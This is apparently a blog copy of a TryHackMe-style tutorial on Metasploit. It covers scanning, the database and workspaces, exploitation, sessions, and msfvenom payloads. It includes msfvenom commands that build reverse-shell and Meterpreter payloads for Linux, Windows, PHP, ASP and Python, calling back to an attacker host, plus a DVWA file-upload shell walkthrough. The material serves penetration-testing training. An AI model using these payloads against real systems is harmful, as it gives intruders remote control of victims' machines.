Metasploit - Exploitation

 

Metasploit: Exploitation

In this article, you will learn how to use Metasploit for vulnerability scanning and exploitation. You will also learn how the database feature makes it easier to manage penetration testing engagements with a broader scope. Finally, we will look at generating payloads with msfvenom and how to start a Meterpreter session on most target platforms.

More specifically, the topics we will cover are:
  • How to scan target systems using Metasploit
  • How to use the Metasploit database feature
  • How to use Metasploit to conduct a vulnerability scan
  • How to use Metasploit to exploit vulnerable services on target systems
  • How msfvenom can be used to create payloads and obtain a Meterpreter session on the target system

Scanning

Port Scanning

Metasploit has a number of modules to scan open ports on the target system and network. You can list potential port-scanning modules available using the search portscan command.


Port scanning modules will require you to set a few options:


  • CONCURRENCY: Number of targets to be scanned simultaneously.
  • PORTS: Port range to be scanned. Please note that 1-1000 here will not be the same as using Nmap with the default configuration. Nmap will scan the 1000 most commonly used ports, while Metasploit will scan port numbers from 1 to 10000.
  • RHOSTS: Target or target network to be scanned.
  • THREADS: Number of threads that will be used simultaneously. More threads will result in faster scans.
You can directly perform Nmap scans from the msfconsole prompt as shown below, faster:


Note: As for information gathering, if your engagement requires a speedier approach to port scanning, Metasploit may not be your first choice. However, a number of modules make Metasploit a useful tool for the scanning phase.

UDP Service Identification

The scanner/discovery/udp_sweep module will allow you to quickly identify services running over the UDP (User Datagram Protocol). As you can see below, this module will not conduct an extensive scan of all possible UDP services, but does provide a quick way to identify services such as DNS or NetBIOS.

SMB Scans

Metasploit offers several useful auxiliary modules that allow us to scan specific services. Below is an example of the SMB. Especially useful in a corporate network would be smb_enumshares and smb_version, but please spend some time identifying scanners that the Metasploit version installed on your system offers.


When performing service scans, it would be important not to omit more "exotic" services such as NetBIOS. NetBIOS (Network Basic Input Output System), similar to SMB, allows computers to communicate over the network to share files or send files to printers. The NetBIOS name of the target system can give you an idea about its role and even importance (e.g., CORP-DC, DEVOPS, SALES, etc.). You may also run across some shared files and folders that could be accessed either without a password or protected with a simple password (e.g., admin, administrator, root, toor, etc.).

Remember, Metasploit has many modules that can help you have a better understanding of the target system and possibly help you find vulnerabilities. It is always worth performing a quick search to see if any modules could be helpful based on your target system.

The Metasploit Database

Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values.

You will first need to start the PostgreSQL database, which Metasploit will use with the following command: systemctl start postgresql.

Then you will need to initialize the Metasploit Database using the msfdb init command. However, trying to run msfdb init as root will give the following error message: "Please run msfdb as a non-root user." This can be solved by running it as the postgres account using sudo -u postgres msfdb init.

The terminal below shows the example output. Command to delete the existing database using sudo -u postgres msfdb delete.


You can now launch msfconsole and check the database status using the db_status command.


The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be in the default workspace. You can list available workspaces using the workspace command.


You can add a workspace using the -a parameter or delete a workspace using the -d parameter, respectively. The screenshot below shows that a new workspace named "tryhackme" was created.


You will also notice that the new database name is printed in red, starting with a * symbol.

You can use the workspace command to navigate between workspaces simply by typing workspace followed by the desired workspace name.


You can use the workspace -h command to list available options for the workspace command.


Different from regular Metasploit usage, once Metasploit is launched with a database, the help command will show the Database Backends Commands menu.


If you run a Nmap scan using the db_nmap shown below, all results will be saved to the database.


You can now reach information relevant to hosts and services running on target systems with the hosts and services commands, respectively. 


The hosts -h and services -h commands can help you become more familiar with available options. Once the host information is stored in the database, you can use the hosts -R command to add this value to the RHOSTS parameter.

Example Workflow
  1. We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with the use of the auxiliary/scanner/smb/smb_ms17_010 command.
  2. We set the RHOSTS value using hosts -R.
  3. We have typed the show options to check if all values were assigned correctly. (In this example, 10.10.138.32 is the IP address we have scanned earlier using the db_nmap command)
  4. Once all parameters are set, we launch the exploit using the run or exploit command. 

If there is more than one host saved to the database, all IP addresses will be used when the hosts -R command is used. 

In a typical penetration testing engagement, we could have the following scenario: 
  • Finding available hosts using the db_nmap command
  • Scanning these for further vulnerabilities or open ports (using a port scanning module)
The services command used with the -S parameter will allow you to search for specific services in the environment.


You may want to look for low-hanging fruit such as:
  • HTTP: Could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE).
  • FTP: Could allow anonymous login and provide access to interesting files.
  • SMB: Could be vulnerable to SMB exploits like MS17-010
  • SSH: Could have default or easy-to-guess credentials
  • RDP: Could be vulnerable to Bluekeep or allow desktop access if weak credentials were used. 
As you can see, Metasploit has many features to aid in engagements, such as the ability to compartmentalize your engagements into workspaces, analyze your results at a high level, and quickly import and explore data.

Vulnerability Scanning

Metasploit allows you to quickly identify some critical vulnerabilities that could be considered “low-hanging fruit”.  The term “low-hanging fruit” usually refers to easily identifiable and exploitable vulnerabilities that could potentially allow you to gain a foothold on a system and, in some cases, gain high-level privileges such as root or administrator.

Finding vulnerabilities using Metasploit will rely heavily on your ability to scan and fingerprint the target. The better you are at these stages, the more options Metasploit may provide you. For example, if you identify a VNC service running on the target, you may use the search function on Metasploit to list useful modules. The results will contain payload and post modules.


You can use the info command for any module to have a better understanding of its use and purpose.


As you can see, the vnc_login module can help us find login details for the VNC service.

Exploitation

As the name suggests, Metasploit is a framework for exploitation. Exploits are the most populated module category.


You can search for exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using the exploit command. While the process itself is simple, remember that a successful outcome depends on a thorough understanding of services running on the target system (refer to My Nmap Cheatsheet & Nmap Scripts for Penetration Testing).

Most of the exploits will have a preset default payload. However, you can always use the show payloads command to list other commands you can use with that specific exploit.


Once you have decided on the payload, you can use the set payload command to make your choice.


Note that choosing a working payload could become a trial-and-error process due to environmental or OS restrictions, such as firewall rules, anti-virus, file writing, or the program performing the payload execution isn't available (e.g., payload/python/shell_reverse_tcp).

Some payloads will open new parameters that you may need to set; running the show options command once more can show these. As you can see in the above example, a reverse payload will at least require you to set the LHOST option.


Once a session is opened, you can background it using CTRL+Z or abort it using CTRL+C. Backgrounding a session will be useful when working on more than one target simultaneously or on the same target with a different exploit and/or shell.


Working with sessions

The sessions command will list all active sessions. The sessions command supports several options that help you manage sessions more effectively.


You can interact with any existing session using the sessions -i command followed by the session ID.

Msfvenom

Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.

Msfvenom will allow you to access all payloads available in the  Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).


Output formats

You can either generate stand-alone payloads (e.g., a Windows executable for Meterpreter) or get a usable raw format (e.g., Python). The msfvenom --list formats command can be used to list supported output formats.

Encoders

Contrary to some beliefs, encoders do not aim to bypass antivirus software installed on the target system. As the name suggests, they encode the payload. While it can be effective against some antivirus software, using modern obfuscation techniques or learning methods to inject shellcode is a better solution to the problem. The example below shows the usage of encoding (with the -e parameter. The PHP version of Meterpreter was encoded in Base64, and the output format was raw.


Handlers

Similar to exploits using a reverse shell, you will need to be able to accept incoming connections generated by the MSFvenom payload. When using an exploit module, this part is automatically handled by the exploit module; you will remember how the payload options title appeared when setting a reverse shell. The term commonly used to receive a connection from a target is 'catching a shell'. Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be easily caught using a handler.

The following scenario may be familiar; we will exploit the file upload vulnerability present in DVWA (Damn Vulnerable Web Application). For the exercises in this task, you will need to replicate a similar scenario on another target system; DVWA was used here for illustration purposes. The exploit steps are:
  1. Generate the PHP shell using MSFvenom
  2. Start the Metasploit handler
  3. Execute the PHP shell
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect. Seen below, 10.0.2.19 is the IP address of the AttackBox used in the attack, and local port 7777 was chosen.


Please note: The output PHP file will miss the starting PHP tag commented and the end tag (?>), as seen below.


The reverse_shell.php file should be edited to convert it into a working PHP file. 

Below: Comments removed from the beginning of the file.


Below: End tag added


We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.


Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.

To use the module, we will need to set the payload value (php/reverse_php in this case), the LHOST, and LPORT values.


Once everything is set, we will run the handler and wait for the incoming connection.


When the reverse shell is triggered, the connection will be received by multi/handler and provide us with a shell.

If the payload was set as Meterpreter (e.g., in a Windows executable format), multi/handler would then provide us with a Meterpreter shell.

Other Payloads

Based on the target system's configuration (operating system, installed web server, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:

In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.

Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
The .elf format is comparable to the .exe format in Windows. These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine's command line.

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe


PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

All of the examples above are reverse payloads. This means you will need to have the exploit/multi/handler module listening on your attacking machine to work as a handler. You will need to set up the handler accordingly to the payload, LHOST, and LPORT parameters. These values will be the same you have used when creating the msfvenom payload.

You can also search Meterpreter payloads via Metasploit:

search meterpreter type:payload platform:windows


And then use these meterpreter payloads within metasploit:


Don't forget to generate the payload:


So, you can generate meterpreter payloads with the help of msfvenom or Metasploit.

Glossary

  • Metasploit is an open-source penetration testing framework that enables security professionals to identify and exploit vulnerabilities in computer systems. It includes a database of known vulnerabilities and tools and scripts for exploiting them.
  • Nmap: Nmap (Network Mapper) is an open-source tool used for network discovery and security auditing. It also assists in the exploration of network hosts and services, providing information about open ports, operating systems, and other details.
  • UDP: User Datagram Protocol (UDP) is a connectionless protocol; UDP does not require a connection to be established. UDP is suitable for protocols that rely on fast queries, such as DNS, and for protocols that prioritise real-time communications, such as audio/video conferencing and broadcasting.
  • DNS: Domain Name System (DNS) is the protocol responsible for resolving hostnames, such as tryhackme.com, to their respective IP addresses.
  • NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model, allowing applications on separate computers to communicate over a local area network.
  • SMB: Server Message Block (SMB) is a communication protocol originally developed in 1983 by Barry A. Feigenbaum at IBM and intended to provide shared access to files and printers across nodes on a network of systems running IBM's OS/2. It also provides an authenticated inter-process communication (IPC) mechanism.
  • DC: A domain controller is a server that manages security authentication requests in a Windows Server network. It stores user account information and controls access to network resources. It is a critical component for managing and securing a network infrastructure.
  • DevOps is a set of practices, tools, and a cultural philosophy that automate and integrate the processes to build software.
  • Hypertext Transfer Protocol (HTTP) is the protocol that specifies how a web browser and a web server communicate. Your web browser requests content from the TryHackMe web server using the HTTP protocol as you go through this room.
  • File Transfer Protocol (FTP) is a protocol designed to help the efficient transfer of files between different and even non-compatible systems. It supports two modes for file transfer: binary and ASCII (text).
  • Secure Shell (SSH) refers to a cryptographic network protocol used in secure communication between devices. SSH encrypts data using cryptographic algorithms, such as Advanced Encryption System (AES), and is often used when logging in remotely to a computer or server.
  • RDP: Remote Desktop Protocol is a protocol used to establish remote graphical sessions over the network.











Comments

Popular Posts